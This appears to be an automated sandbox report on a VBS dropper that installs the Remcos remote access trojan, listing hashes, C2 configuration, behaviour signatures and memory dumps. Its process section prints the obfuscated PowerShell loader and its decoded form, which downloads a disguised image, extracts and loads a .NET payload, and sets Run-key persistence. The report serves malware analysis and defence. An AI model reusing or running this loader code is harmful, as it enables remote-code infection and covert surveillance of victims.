remcos | 3b0a938deff8206e336ac2fd86c31c3f9ad22e493ba037c2bc14c7b424e3f4eb | Triage

Analysis

max time kernel
298s
max time network
286s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
20-04-2024 09:46

Sharing

Report Analysis Logs

General

Target

UZOyJ.vbs
Size

12KB
MD5

bbda92e82f45a249a542b40c6ecfa507
SHA1

aa678d29ba51f72a02c73f898ebbe0eb6ce60a74
SHA256

3b0a938deff8206e336ac2fd86c31c3f9ad22e493ba037c2bc14c7b424e3f4eb
SHA512

dcf8b1556440ca86e5ff963812ef071464a6f00249ba039ce20b68cbe5a571c010d2537b86e23563b4dc47465230b3c1279bd5c411b1a864de38b1332f2b9079
SSDEEP

384:Y/VwiDCXdu3NF3S0P0V2VVSUEEJNcr5+EJNcr5z525f+ofhuSw309RWEd+m0Wio9:Y/Si+Xd0NNbP0V2VMUEEJNcV+EJNcVzg

Score

10^/10

remcos remotehost persistence rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

sembe.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
notess
keylog_path
%AppData%
mouse_option
false
mutex
Rmc-P0AEMX
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

2 4872 powershell.exe
4 4872 powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

Registry Run Keys / Startup Folder

Modify Registry

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\WQQ.vbs"	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 4872 set thread context of 2148 4872 powershell.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	process
2712	powershell.exe
2712	powershell.exe
2712	powershell.exe
4872	powershell.exe
4872	powershell.exe
4872	powershell.exe
2260	powershell.exe
2260	powershell.exe
2260	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2712 powershell.exe
Token: SeDebugPrivilege 4872 powershell.exe
Token: SeDebugPrivilege 2260 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

RegAsm.exe

pid process

2148 RegAsm.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2428 wrote to memory of 2712	2428	WScript.exe	powershell.exe
PID 2428 wrote to memory of 2712	2428	WScript.exe	powershell.exe
PID 2712 wrote to memory of 4872	2712	powershell.exe	powershell.exe
PID 2712 wrote to memory of 4872	2712	powershell.exe	powershell.exe
PID 4872 wrote to memory of 2260	4872	powershell.exe	powershell.exe
PID 4872 wrote to memory of 2260	4872	powershell.exe	powershell.exe
PID 4872 wrote to memory of 2148	4872	powershell.exe	RegAsm.exe
PID 4872 wrote to memory of 2148	4872	powershell.exe	RegAsm.exe
PID 4872 wrote to memory of 2148	4872	powershell.exe	RegAsm.exe
PID 4872 wrote to memory of 2148	4872	powershell.exe	RegAsm.exe
PID 4872 wrote to memory of 2148	4872	powershell.exe	RegAsm.exe
PID 4872 wrote to memory of 2148	4872	powershell.exe	RegAsm.exe
PID 4872 wrote to memory of 2148	4872	powershell.exe	RegAsm.exe
PID 4872 wrote to memory of 2148	4872	powershell.exe	RegAsm.exe
PID 4872 wrote to memory of 2148	4872	powershell.exe	RegAsm.exe
PID 4872 wrote to memory of 2148	4872	powershell.exe	RegAsm.exe
PID 4872 wrote to memory of 2148	4872	powershell.exe	RegAsm.exe
PID 4872 wrote to memory of 2148	4872	powershell.exe	RegAsm.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\UZOyJ.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRgBEDgTreFEDgTreVwDgTrevDgTreDQDgTreNDgTreDgTrexDgTreC8DgTreNQDgTre3DgTreC4DgTreMDgTreDgTre2DgTreC4DgTreNQDgTre5DgTreC4DgTreMwDgTreyDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBXDgTreFEDgTreUQDgTrenDgTreCwDgTreJwBSDgTreGUDgTreZwBBDgTreHMDgTrebQDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDQW/441/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'WQQ','RegAsm',''))} }"
3⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\WQQ.vbs
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2260

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:2148

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

Registry Run Keys / Startup Folder

Privilege Escalation

Boot or Logon Autostart Execution

Registry Run Keys / Startup Folder

Defense Evasion

Modify Registry

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
f6c90ab0db80c6c3ea92556fda7273c7

SHA1
01d3866b1887cbb0abe9701f6b49c5dbc66a7dfa

SHA256
a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269

SHA512
aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
e93a841f35583d284db0bb6216683906

SHA1
663f7f13552f2c15b0bb786a36d322940685e541

SHA256
4340fcd0436a27942c9e320c53df88c6dec14e118e80554efecff49e340c7d88

SHA512
76bf9c644033bfb633405acdf053a1efd127d3d673d99e8bb9c78d6eabf03e9fbace27263a7f89503e9c616e83623fa4c2508c01967ee53c414df6755ed4feb3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
748b249461666410021a562bca09bea9

SHA1
baea7c2ab35cb73fe9826a5a85f709ef58891a11

SHA256
8842b5d7f5ce2bf2f7129ca406201088b63860ea6d03d2c8893aef14051e71ea

SHA512
3560125f24b43fd53522602d6cd6c7a5c9a8e10a177633bf914cdee5f07c649026580ad4199a293518ed22b1d1f26480546ed18dbbf226683c69620025487e34

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yun300nz.n43.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\notess\logs.dat
Filesize
144B

MD5
295d85bc82ecd2b8ced96798a64dff29

SHA1
dd2f3102fa13f231f7d29697ac274f5ee8eeee3a

SHA256
e0c97187a611ae1ea39f4474b76f8f47598a6501dfc5412a66fa0792642dd320

SHA512
c5e0e02347494fdde817e23221688b049f7071be5186188acfbd27f5bb71737dbad6736cc67586a07c0a133fde277006e16da10aa991644fb92cfc06fbf17c26

Download Submit
memory/2148-134-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-142-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-183-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-103-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-175-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-174-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-102-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-167-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-166-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-159-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-158-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-151-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-150-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-84-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-143-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-110-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-89-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-91-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-135-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-127-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-93-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-98-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-126-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-101-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-119-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-118-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-182-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-104-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-105-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-106-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2148-109-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2260-82-0x0000025E56490000-0x0000025E564A0000-memory.dmp

Filesize
64KB

Download
memory/2260-83-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp

Filesize
9.9MB

Download
memory/2260-58-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp

Filesize
9.9MB

Download
memory/2260-59-0x0000025E56490000-0x0000025E564A0000-memory.dmp

Filesize
64KB

Download
memory/2712-10-0x0000024FDDCA0000-0x0000024FDDD16000-memory.dmp

Filesize
472KB

Download
memory/2712-6-0x0000024FDD8B0000-0x0000024FDD8C0000-memory.dmp

Filesize
64KB

Download
memory/2712-4-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp

Filesize
9.9MB

Download
memory/2712-100-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp

Filesize
9.9MB

Download
memory/2712-7-0x0000024FDD840000-0x0000024FDD862000-memory.dmp

Filesize
136KB

Download
memory/2712-5-0x0000024FDD8B0000-0x0000024FDD8C0000-memory.dmp

Filesize
64KB

Download
memory/2712-56-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp

Filesize
9.9MB

Download
memory/2712-94-0x0000024FDD8B0000-0x0000024FDD8C0000-memory.dmp

Filesize
64KB

Download
memory/2712-79-0x0000024FDD8B0000-0x0000024FDD8C0000-memory.dmp

Filesize
64KB

Download
memory/4872-81-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp

Filesize
9.9MB

Download
memory/4872-90-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp

Filesize
9.9MB

Download
memory/4872-25-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp

Filesize
9.9MB

Download
memory/4872-48-0x000002B918000000-0x000002B9182C2000-memory.dmp

Filesize
2.8MB

Download
memory/4872-47-0x000002B970110000-0x000002B970120000-memory.dmp

Filesize
64KB

Download
memory/4872-26-0x000002B970110000-0x000002B970120000-memory.dmp

Filesize
64KB

Download
memory/4872-27-0x000002B970110000-0x000002B970120000-memory.dmp

Filesize
64KB

Download